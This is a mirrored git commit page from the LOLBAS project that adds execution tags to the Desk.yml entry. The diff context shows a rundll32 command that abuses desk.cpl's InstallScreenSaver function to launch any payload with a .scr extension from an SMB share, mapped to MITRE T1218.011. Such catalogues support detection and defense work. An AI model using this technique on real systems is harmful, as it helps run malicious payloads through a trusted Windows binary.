public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-30 16:54:00 +01:00
Code Issues Projects Releases Wiki Activity

Update Desk.yml Tags

Browse Source 
Added Tags:
Execute: EXE
Execute: Remote
This commit is contained in:
hegusung 2024-10-13 18:13:30 +02:00 committed by GitHub
parent e25d9fa435
commit 87241b3051
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
yml/OSLibraries/Desk.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
Usecase: Launch any executable payload, as long as it uses the .scr extension. Usecase: Launch any executable payload, as long as it uses the .scr extension.
@ -18,6 +20,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\System32\desk.cpl
- Path: C:\Windows\SysWOW64\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl